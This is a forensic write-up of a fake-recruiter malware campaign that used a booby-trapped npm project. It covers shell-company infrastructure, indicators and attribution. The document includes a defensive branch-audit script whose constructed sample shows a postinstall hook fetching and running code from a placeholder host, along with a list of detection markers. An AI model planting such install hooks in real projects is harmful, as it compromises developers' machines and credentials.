Trifleck Shell Cluster: A Four-Front Contagious Interview Investigation
Forensic investigation of the Trifleck / Blockstar fake-recruiter campaign that targeted a Bengaluru engineer in May 2026. Four-entity shell cluster, IOCs, attribution.
This is the long-form forensic record. For the buyer-facing summary and “what to do” guidance, read the blog post.
Scope of this investigation
A senior frontend engineer in Bengaluru was targeted on 6 May 2026 with a fake LinkedIn recruitment pitch from “John Burleson, COO at Trifleck.” The pitch followed a documented Contagious Interview playbook: above-market rate, two recruiter personas, project brief PDF, Google Drive ZIP labeled Blockstar.zip containing malware. The target recognised the pattern and did not run the code.
This investigation documents what we found when we pulled the thread:
- Trifleck is one of four shell entities sharing infrastructure
- Two of the four domains were registered three hours and ten minutes apart on the same day, from the same registrar, behind the same anonymous Icelandic privacy proxy
- Trifleck has no business registration in Florida or Delaware
- The recruiter’s photo was stolen from a 14-year-old Gravatar account
- The Trifleck website ships its Terms of Service with literal unfilled `(email address)` and `(business address)` template placeholders
- The campaign is the publicly documented Contagious Interview cluster attributed by Microsoft, Mandiant, Palo Alto Unit 42, the FBI, and others to DPRK-aligned threat actors
The cluster of fronts (Trifleck, Fleck Publisher, Virginia Book Publisher, The Creative Unit) and the structural shared-infrastructure evidence tying them to a single operator has not been previously published. This investigation is the first public record.
The targeting filter
The job description Burleson shared, named 02.Trifleck-Frontend.docx (the 02. prefix suggests a numbered template kit), reads as a standard senior frontend role on the surface. Reading it as a victim filter instead of a job ad changes the picture.
Under Preferred Qualifications, the JD lists:
Experience with Web3 technologies (ethers.js, web3.js, wallet integrations).
Under Key Responsibilities:
Work with blockchain engineers to support Web3 interactions.
Under What We Offer:
Equity / token-based compensation opportunities (role-dependent).
Together these three lines do not describe a generic frontend role. They describe a filter. A candidate who self-selects into this role almost certainly has wallet extensions installed, Web3 development credentials on the machine, and crypto holdings the attacker can target after the loader executes.
The Blockstar project name reinforces the filter. The pitch describes a fractional real estate investing platform on blockchain. This is a documented Contagious Interview decoy pattern. The October 2025 case of David Dodda, published on his own blog and later referenced by PhishFort, involved an almost identical pretext: a real estate workflow platform called BestCity pitched by a fake Chief Blockchain Officer at Symfa.
This campaign is not casting a wide net. It is filtering for people whose machines are worth compromising.
The technical chain
We extracted the ZIP in a sandbox. The structure is standard for this campaign cluster:
- A `package.json` with a `prepare`, `postinstall`, or `preinstall` lifecycle hook
- A clean-looking main branch with placeholder code
- A dev branch that contains the actual malicious payload
- A README that instructs the target to switch branches
The execution flow:
- Target receives the ZIP via Google Drive
- Target extracts and reads the README
- README instructs `git checkout dev`
- Target runs `npm install` to set up dependencies
- The lifecycle hook fires automatically
- The loader script reaches out to a command and control server
- The C2 returns a follow-on payload tailored to the environment
- Stage 2 payload executes, harvesting browser credentials, wallet extension data, SSH keys, environment variables, and cloud CLI tokens
VirusTotal detection on the archive: HEUR:Trojan-Downloader.Shell.Agent.bc (Dr.Web). The Drive viewer URL was first submitted to VirusTotal on 6 May 2026, the same day Burleson initiated contact. The file appears to have been uploaded specifically for this campaign rather than pulled from older infrastructure.
The branch-hiding technique deserves attention. Most automated scanners check the root state of a repository. Splitting the payload across branches evades scanners that assume main is what matters. If you ever inspect an unfamiliar repo, list all branches and inspect each one before any local execution.
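To make that branch check routine, here is an added example (not the investigation's own tooling and not code from the campaign): a Python audit that reads `package.json` from every branch of a checkout via `git show`, so nothing is checked out and no install runs, and reports npm lifecycle hooks, flagging commands that fetch or evaluate code. The sample branches are constructed, and `example.invalid` is a placeholder host.

```python
import json
import subprocess
from pathlib import Path

# npm runs these scripts on its own during `npm install`; nothing prompts the user.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare", "prepublish")

# Markers that usually mean a hook fetches or evaluates code instead of building
# the project. Not proof of malice on their own, but they earn a manual read.
FETCH_OR_EVAL = ("curl ", "wget ", "http://", "https://", "node -e", "eval(", "base64")


def find_lifecycle_hooks(package_json_text):
    """Map each lifecycle hook in a package.json to its command and a suspicion flag."""
    try:
        data = json.loads(package_json_text)
    except json.JSONDecodeError:
        return {}
    if not isinstance(data, dict):
        return {}
    scripts = data.get("scripts") or {}
    found = {}
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if isinstance(cmd, str):
            found[hook] = {"command": cmd,
                           "suspicious": any(m in cmd for m in FETCH_OR_EVAL)}
    return found


def audit_branches(branches):
    """branches maps branch name -> package.json text (None if the branch has none)."""
    return {name: find_lifecycle_hooks(text) for name, text in branches.items() if text}


def audit_repo(repo_path):
    """Read package.json from every local and remote branch with `git show`
    (no checkout, no install), then audit each one."""
    repo = str(Path(repo_path))
    refs = subprocess.run(
        ["git", "-C", repo, "for-each-ref", "--format=%(refname:short)",
         "refs/heads", "refs/remotes"],
        capture_output=True, text=True, check=True).stdout.split()
    branches = {}
    for ref in refs:
        show = subprocess.run(["git", "-C", repo, "show", f"{ref}:package.json"],
                              capture_output=True, text=True)
        branches[ref] = show.stdout if show.returncode == 0 else None
    return audit_branches(branches)


# Constructed sample of the pattern described above: a clean main branch and a
# dev branch whose postinstall hook pipes a download straight into node.
# example.invalid is a placeholder, not a real host.
SAMPLE_BRANCHES = {
    "main": '{"name": "blockstar-frontend", '
            '"scripts": {"dev": "next dev", "build": "next build"}}',
    "dev": '{"name": "blockstar-frontend", '
           '"scripts": {"dev": "next dev", '
           '"postinstall": "curl -s https://example.invalid/init | node"}}',
}

if __name__ == "__main__":
    # For a real extracted project: audit_repo("/path/to/extracted/project")
    for branch, hooks in audit_branches(SAMPLE_BRANCHES).items():
        for hook, info in hooks.items():
            tag = "SUSPICIOUS" if info["suspicious"] else "review"
            print(f"[{tag}] branch={branch} {hook}: {info['command']}")
```

`npm install --ignore-scripts` is the install-time counterpart: it stops the hooks from running at all, while the audit tells you what they would have done.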
We ran the receipts on Trifleck
The company in the pitch is named Trifleck, with a polished website at trifleck.com and a listed address of 1133 Louisiana Ave, Winter Park, FL 32789. We ran six independent checks on this entity.
1. The recruiter’s profile photo is stolen
We ran a reverse image search on the LinkedIn profile photo used by John Burleson. The photo appears at full resolution on a Gravatar account under the username pastorwynn. Gravatar reports the pastorwynn profile as Created 14 years ago, which places the photo on Gravatar approximately 13 years before the trifleck.com domain was registered in May 2025.
The same image also appears on multiple unrelated religious-themed websites and Pinterest boards, none of which have any connection to Trifleck or to a John Burleson. The Gravatar match is the cleanest pixel-level confirmation, because Gravatar is a neutral identity service and the chronology is unambiguous.
The photo is of a real person whose identity has been misappropriated for this campaign. We are not naming that individual, because they are themselves a victim of identity theft and naming them would tie their name to this campaign in search results indefinitely.
2. The second persona’s photo also does not belong to Trifleck
The Calendly profile for Roman Cole, used as the tech and hiring member for the technical interview, shows a different person. Reverse image search returned matches across unrelated professional design portfolios. Two personas, two faces, neither traceable to the company they claim to represent.
3. Trifleck is not registered as a business in Florida or Delaware
We checked Florida’s Division of Corporations database (Sunbiz) for any entity named Trifleck. There is no such registration. The alphabetical entity list skips directly from TRIFLEET LOGISTICS, LLC to TRIFLES FLORIST, INC. No active registration, no inactive registration, no dissolved registration.

Source: Florida Division of Corporations Sunbiz, captured 2026-05-18.
We also checked Delaware’s Division of Corporations under “Trifleck” and “Fleck Publisher” (the related entity, see cluster section). Neither returned records. The Trifleck website’s Terms of Service, Privacy Policy, and footer do not disclose any underlying registered legal entity name. A B2B software company operating in the US would normally appear in one of these registries.
4. The domain is twelve months old and ownership is concealed
trifleck.com was registered on 21 May 2025 through Namecheap, with registrant identity hidden behind Withheld for Privacy ehf (Reykjavik, Iceland). The domain has three nameservers: two on Vilords (globalcloud1.vilords.com and globalcloud2.vilords.com) and one on Contabo (ns1.contabo.net). Both are budget hosting providers. The site itself is served via Vercel.
5. The company’s contact channel does not function
On 7 May 2026, the target emailed info@trifleck.com asking two questions: is John Burleson an authorized recruiter, and is the Blockstar role real? The email was professional and gave Trifleck a clean opportunity to confirm or deny.
Eleven days passed. No response. The contact form on the Trifleck website is non-functional. The infrastructure designed to make Trifleck look like a real company does not work for the one purpose a real company’s contact channel actually serves.
6. The Terms of Service ships with unfilled template placeholders
Section 14 of the Trifleck Terms of Service contains literal unfilled template placeholders. The contact section reads, verbatim:
Email: (email address)
Address: (business address)

Source: trifleck[.]com/terms-and-conditions, Section 14 “Contact Us”, captured 2026-05-19. We are not linking the live attacker domain.
The placeholder fields were never customized before publication. Any business that genuinely went through legal review of its own ToS would not ship it with unedited template fields.
The recruiter persona’s behavior was the strongest tell
On 7 May 2026 at 03:01 IST, the target asked Burleson directly:
Sure, will check this out. One more thing, just curious and I hope you don’t mind. I checked the Trifleck linkedin page and it does not list you or Roman Cole as their employees, is there any specific reason?
Burleson did not reply for over two hours. Then at 05:24 IST:
Yes, I don’t use LinkedIn often, so I haven’t updated my profile yet.
Two minutes later, at 05:26 IST:
Pls check again.
Real recruiters do not behave like this. The two-minute window between “I don’t use LinkedIn often” and “Pls check again” is behavioral evidence of active operator-driven persona management. Someone tried to manipulate the visible identity to defend the scam in real time. Days later, the entire LinkedIn account was deleted.
Sales Navigator gave us the cleanest deletion confirmation. Searches for John Burleson filtered by COO title returned zero results. Searches for Roman Cole filtered by CTO title returned zero results. Combined searches for the names paired with either Trifleck or Blockstar returned zero results. Both recruiter personas were removed from LinkedIn after the Day 1 inquiry was sent.
It’s a cluster of four, not a single front
After the Trifleck receipts came in, we pulled the thread further. Trifleck does not operate alone. It is one of four entities that share infrastructure, share an Iceland-proxied WHOIS, and in one case share a domain registration timestamp three hours apart.
| Entity | Industry | Claimed HQ | LinkedIn status |
|---|---|---|---|
| Trifleck | Software Development | Winter Park, FL | Active page, 26 visible members |
| Fleck Publisher | Book Publishing | 8201 Greensboro Dr, McLean, VA 22102 | Active page, 2 visible members |
| Virginia Book Publisher | Book Publishing | 8201 Greensboro Dr, McLean, VA 22102 | Active page, 0 visible members |
| The Creative Unit | IT Services | Not disclosed | Page deleted from LinkedIn |
All four surfaced in each other’s “Pages people also viewed” sidebar at the time of the investigation. Fleck Publisher and Virginia Book Publisher list the identical street address. The Creative Unit’s LinkedIn page now returns “no longer available,” the same takedown pattern observed on the Burleson and Cole personas.

Source: linkedin.com/company/thecreativeunit, captured 2026-05-19.
The structural smoking gun: three-hour same-day domain registration
Domain WHOIS gives us the cleanest piece of attribution evidence in the entire investigation. All three WHOIS lookups captured 2026-05-18 and 2026-05-19 against the live Namecheap registry:
| Domain | Created (UTC) | Registrar | Nameservers |
|---|---|---|---|
| trifleck.com | 2025-05-21 15:59:33 | Namecheap | globalcloud1/2.vilords.com |
| fleckpublisher.com | 2025-05-21 19:09:00 | Namecheap | globalcloud1/2.vilords.com + ns1.contabo.net |
| virginiabookpublisher.com | 2025-11-18 19:42:11 | Namecheap | globalcloud1/2.vilords.com + ns1.contabo.net |
Source: WHOIS captured via Namecheap’s lookup tool 2026-05-18 (trifleck.com) and 2026-05-19 (fleckpublisher.com, virginiabookpublisher.com). Raw WHOIS output preserved in the evidence pack at data/trifleck-investigation/2026-05-18/whois-trifleck-com.txt and data/trifleck-investigation/2026-05-19/.
trifleck.com and fleckpublisher.com were registered three hours and ten minutes apart on the same day, with the same registrar, behind the same anonymous Icelandic privacy proxy, using the same budget DNS provider (Vilords). The probability that two unrelated firms (one a Florida software agency, one a Virginia book publisher) registered their domains within a single afternoon, on the same registrar, behind the same Withheld for Privacy proxy in Reykjavik, is functionally zero. This is shared-operator evidence at a level that does not require LinkedIn correlation to interpret.
virginiabookpublisher.com was registered six months later. Same registrar, same nameservers, same WHOIS privacy proxy. A second wave from the same operator.
Shared infrastructure across all three live entities
The three live domains share more than a registration window:
- Registrar: Namecheap for all three
- WHOIS privacy: Withheld for Privacy ehf (Reykjavik, Iceland) across the cluster
- DNS nameservers: `globalcloud1.vilords.com` and `globalcloud2.vilords.com`, with `ns1.contabo.net` added on the two publisher domains
- Hosting: all three apex domains resolve to Vercel anycast (76.76.21.21)
- Email-sending IP shared between the two publishers: SPF for both `fleckpublisher.com` and `virginiabookpublisher.com` authorizes `144.91.82.217`, a Vilords IP whose reverse DNS resolves to `globalcloud.vilords.com`
Trifleck uses Mailgun for outbound mail; the two publishers share the Vilords IP. Two distinct email-sending configurations within the same operator’s cluster.
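The pivot logic behind the two tables above can be written down explicitly. This is an added example, not part of the original investigation: records are built from the WHOIS and DNS values documented on this page plus one constructed control domain (`unrelated.example`), and two domains are linked only when they share several independent attributes, so a common registrar or a CDN IP never clusters on its own.

```python
from datetime import datetime, timedelta
from itertools import combinations

# Records built from the WHOIS and DNS values documented on this page, plus one
# constructed control domain (unrelated.example) that should not cluster.
RECORDS = [
    {"domain": "trifleck.com", "created": "2025-05-21 15:59:33",
     "registrar": "Namecheap", "privacy": "Withheld for Privacy ehf",
     "ns": {"globalcloud1.vilords.com", "globalcloud2.vilords.com"}, "a": "76.76.21.21"},
    {"domain": "fleckpublisher.com", "created": "2025-05-21 19:09:00",
     "registrar": "Namecheap", "privacy": "Withheld for Privacy ehf",
     "ns": {"globalcloud1.vilords.com", "globalcloud2.vilords.com", "ns1.contabo.net"},
     "a": "76.76.21.21"},
    {"domain": "virginiabookpublisher.com", "created": "2025-11-18 19:42:11",
     "registrar": "Namecheap", "privacy": "Withheld for Privacy ehf",
     "ns": {"globalcloud1.vilords.com", "globalcloud2.vilords.com", "ns1.contabo.net"},
     "a": "76.76.21.21"},
    {"domain": "unrelated.example", "created": "2025-05-21 16:30:00",
     "registrar": "OtherRegistrar", "privacy": None,
     "ns": {"ns1.example.net", "ns2.example.net"}, "a": "192.0.2.10"},
]


def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


def shared_pivots(a, b, window=timedelta(hours=24)):
    """List the infrastructure attributes two domains share. Any one of them
    (a big registrar, a CDN IP) is weak on its own; the stack is the evidence."""
    pivots = []
    if a["registrar"] == b["registrar"]:
        pivots.append("registrar")
    if a["privacy"] and a["privacy"] == b["privacy"]:
        pivots.append("privacy_proxy")
    if a["ns"] & b["ns"]:
        pivots.append("nameservers")
    if a["a"] == b["a"]:
        pivots.append("hosting_ip")
    gap = abs(parse_ts(a["created"]) - parse_ts(b["created"]))
    if gap <= window:
        secs = int(gap.total_seconds())
        pivots.append(f"created_{secs // 3600}h{secs % 3600 // 60:02d}m_apart")
    return pivots


def cluster(records, min_pivots=3):
    """Union domains that share at least min_pivots attributes; return the groups
    (sorted) and the per-pair evidence so every link can be audited."""
    parent = {r["domain"]: r["domain"] for r in records}

    def find(x):
        while parent[x] != x:
            x = parent[x]
        return x

    evidence = {}
    for a, b in combinations(records, 2):
        pivots = shared_pivots(a, b)
        evidence[(a["domain"], b["domain"])] = pivots
        if len(pivots) >= min_pivots:
            parent[find(a["domain"])] = find(b["domain"])
    groups = {}
    for r in records:
        groups.setdefault(find(r["domain"]), []).append(r["domain"])
    return sorted(sorted(g) for g in groups.values()), evidence


if __name__ == "__main__":
    groups, evidence = cluster(RECORDS)
    for g in groups:
        print("cluster:", ", ".join(g))
    for pair, pivots in evidence.items():
        print(f"{pair[0]} <-> {pair[1]}: {pivots}")
```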
Workforce composition does not match the claimed business
Sales Navigator broke down Trifleck’s 26 visible members by function:
- 9 in Human Resources (the single largest function)
- 8 in Business Development
- 5 in Information Technology
- 5 in Sales
A B2B software development agency that has more HR staff than engineers, and more business development staff than engineers, has a workforce composition that does not match its claimed business. This is the workforce composition of an outbound recruitment operation, not a working software firm.

Source: linkedin.com/company/trifleck via LinkedIn Sales Navigator About panel, captured 2026-05-19.
Geography reinforces the picture. Of 26 claimed employees, 9 are in the United Kingdom, 6 in the United States. Only one of those is in Winter Park, FL, the claimed HQ.
Backdated tenures
The Sales Navigator employee count chart for Trifleck shows the headcount starting at ~14 in May 2024 and climbing steadily to 26 by May 2026. The trifleck.com domain was registered in May 2025. A real company does not have a workforce on its payroll a year before it has email infrastructure.

Source: linkedin.com/company/trifleck via Sales Navigator Growth Insights, captured 2026-05-19.
The individual tenure data is worse. Four Trifleck employees, located in four different countries (two in Mexico, one in England, one in Italy), all in HR or talent management roles, show identical tenure of “5 years 1 month” at Trifleck. Smaller clusters repeat at 4 years 1 month, 3 years 11 months, and 3 years 1 month across geographically and functionally unrelated employees. Real workforces do not synchronize their LinkedIn start dates across continents.
Sales Navigator’s “Past company = Trifleck” search returns zero results. A company that claims a five-year operating history and 26 employees produces alumni. Trifleck produces none.
Blockstar Corporation in Chicago is real and unrelated
We are publishing this section to prevent a defamation problem.
While investigating Trifleck on Sales Navigator, Blockstar Corporation appeared in Trifleck’s “Pages people also viewed” sidebar. This is a real and unrelated company. Blockstar Corporation is a Chicago-based blockchain services firm founded in 2020, with 16 employees, organic headcount growth, a 2.3-year median tenure, and a documented business focus on real estate tokenization.
The LinkedIn link from Trifleck to Blockstar Corporation appears to be an algorithm-driven name-proximity artifact, not a network signal. Crucially, Blockstar Corporation does not show Trifleck in its own “Pages people also viewed” sidebar. The link is one-way.
The malicious project pretext used in this scam was named Blockstar.zip. That filename should not be confused with Blockstar Corporation operating out of Chicago. They are unrelated.

Source: LinkedIn Sales Navigator About panel for Blockstar Corporation (Chicago, IL), captured 2026-05-19. Real and unrelated company.
Campaign attribution
This is the publicly documented Contagious Interview campaign, attributed by multiple major security vendors to DPRK-aligned threat actors. Attribution names vary by reporting organization:
- Microsoft Threat Intelligence tracks this as Sapphire Sleet
- Palo Alto Unit 42 tracks the cluster as CL-STA-0240, with malware families BeaverTail and InvisibleFerret. Securonix tracks an overlapping cluster as DEV#POPPER.
- Mandiant tracks the cluster as UNC5342.
- Trend Micro tracks the operator as Void Dokkaebi, also known as Famous Chollima.
- SentinelLABS, Sekoia, and Silent Push have all published deep analyses on the campaign cluster.
The Trifleck / Blockstar instance does not appear in any prior public report or scam database. As of this writing, this investigation is the first public record of this specific cluster of fronts (Trifleck, Fleck Publisher, Virginia Book Publisher, and The Creative Unit) and the structural shared-infrastructure evidence that ties them to a single operator.
Indicators of compromise
Shell cluster (four front entities, single operator):
- Trifleck (`trifleck[.]com`): Software Development, Winter Park, FL
- Fleck Publisher (`fleckpublisher[.]com`): Book Publishing, 8201 Greensboro Dr, McLean, VA 22102
- Virginia Book Publisher (`virginiabookpublisher[.]com`): Book Publishing, 8201 Greensboro Dr, McLean, VA 22102
- The Creative Unit (LinkedIn page deleted): IT Services
Personas referenced in this campaign instance:
- Recruiter: John Burleson (LinkedIn profile deleted)
- Tech interviewer: Roman Cole (Calendly handle: `calendly[.]com/roman_cole`)
- Google Drive file owner: `williamherr8@gmail.com` (blocked by Google following abuse report)
Domain forensics:
- `trifleck[.]com`: created 2025-05-21 15:59:33 UTC, registrar Namecheap, hosting Vercel, MX `mail.trifleck.com`, SPF `v=spf1 include:mailgun.org ~all`
- `fleckpublisher[.]com`: created 2025-05-21 19:09:00 UTC (3hr10m after trifleck.com), registrar Namecheap, hosting Vercel
- `virginiabookpublisher[.]com`: created 2025-11-18 19:42:11 UTC, registrar Namecheap, hosting Vercel
- Shared WHOIS privacy across cluster: Withheld for Privacy ehf (Reykjavik, Iceland)
- Shared nameservers across cluster: `globalcloud1.vilords.com`, `globalcloud2.vilords.com` (`ns1.contabo.net` added on the two publisher domains)
- Shared Vercel anycast IP: 76.76.21.21
- Shared email-sending IP across both publishers: 144.91.82.217 (Vilords IP, reverse DNS `globalcloud.vilords.com`)
File and project:
- Filename: `Blockstar.zip`
- Google Drive ID: `1Zhq9492tzYYoFFpIMU3VOd5KQgs2a6l-`
- Drive viewer URL first submitted to VT: 2026-05-06
- VirusTotal detection: `HEUR:Trojan-Downloader.Shell.Agent.bc` (Dr.Web)
- Project pretext name: Blockstar (fractional real estate investing platform)
Execution pattern:
- Delivery: Google Drive ZIP with explicit README instruction
- Trigger: `git checkout dev` followed by `npm install`
- Mechanism: preinstall or postinstall lifecycle hook
- Stage 2: Loader fetches follow-on payload from C2 server
Reporting actions taken:
- Google Drive abuse report submitted (account `williamherr8@gmail.com` blocked by Google)
- Google Safe Browsing submitted (under review)
- VirusTotal URL submitted and rescanned
- LinkedIn report filed on the recruiter persona
If your team has seen the same persona names, the same domain, or the same delivery pattern, we would like to hear about it. The faster these indicators are mapped, the faster the next front in this campaign can be flagged.
Changelog
This investigation is the public record of an active research effort. We update it when new evidence comes in.
2026-05-20 (split + relocated to /investigations/)
- Relocated the forensic depth from `/blog/fake-recruiter-blockstar-trifleck-malware-india-2026/` to this `/investigations/trifleck-shell-cluster/` URL.
- Blog post retains the buyer-facing summary (how to spot the pattern, what to do if compromised, verification CTA) and links back here for the full forensic record. The split was driven by the original post’s 30+ minute reading time hurting buyer conversion, while researcher and journalist readers benefit from a dedicated long-form investigation URL.
2026-05-19 (Day 2 expansion + restructure)
- Discovered the four-entity shell cluster: Trifleck plus three additional fronts (Fleck Publisher, Virginia Book Publisher, The Creative Unit).
- Added the structural smoking gun: `trifleck.com` and `fleckpublisher.com` registered three hours and ten minutes apart on the same day.
- Identical 8201 Greensboro Dr, McLean VA street address shared by Fleck Publisher and Virginia Book Publisher.
- Added Section 6 of the Trifleck receipts: Terms of Service shipped with unfilled `(email address)` and `(business address)` template placeholders.
- Expanded registry search to Delaware (no records under Trifleck or Fleck Publisher).
- Workforce composition signals: 9 HR / 8 BD / 5 IT.
- Backdated tenure clusters: four employees in four countries with identical “5 years 1 month” tenure.
- Added defensive clearance for Blockstar Corporation in Chicago.
- Embedded 6 forensic screenshots with source-link captions.
- Both recruiter personas (John Burleson, Roman Cole) confirmed deleted from LinkedIn.
2026-05-18 (Day 1 publication)
- Original publication documenting Anil N’s near-compromise via the fake Trifleck recruitment pitch.
- Five-check Trifleck verification: stolen recruiter photo (Gravatar pastorwynn match, 14-year chronology), stolen second persona photo, no Florida business registration, year-old domain with concealed WHOIS, non-functional contact channel after 11-day silence.
- Recruiter persona behavior tell: the two-minute “Pls check again” window documenting active operator-driven persona management.
- Campaign attribution to the publicly documented Contagious Interview / Sapphire Sleet / UNC5342 / Void Dokkaebi / Famous Chollima cluster.
- Indicators of compromise listed for security teams.
Disclaimer
This investigation is for public awareness. Cybersecify is an independent cybersecurity consultancy and is not affiliated with or endorsed by any law enforcement or government agency. The technical analysis described is best-effort triage based on the artifacts shared with us. Naming of the companies, personas, and infrastructure in this writeup reflects the facts as documented and verified at the time of publication, including a good-faith inquiry to the named company’s listed contact address that received no response over an eleven-day window before publication.
For the avoidance of doubt: Blockstar Corporation, a Chicago-based blockchain services firm founded in 2020 that focuses on real estate tokenization, is a real and unrelated company. Its appearance in the LinkedIn “Pages people also viewed” sidebar of Trifleck is an algorithm-driven name-proximity artifact, not a network signal, and the link does not appear in the reverse direction. The reused project pretext name Blockstar.zip in the malicious file does not connect to Blockstar Corporation in any way. Nothing in this investigation should be read as a claim about Blockstar Corporation or its leadership.
Verification offered to readers is best-effort guidance, not legal or law enforcement advice. For emergencies or legal reporting in India, contact official authorities or use the National Cybercrime Helpline 1930.
For the short version
If you got the same pitch and need quick guidance, read the buyer-facing summary on the blog.
Got the same pitch? We verify.
Send the recruiter's name, their LinkedIn URL, the company they claim to represent, and any file or link they shared. We'll tell you if it's a real recruitment process or a scam. No charges. No judgment.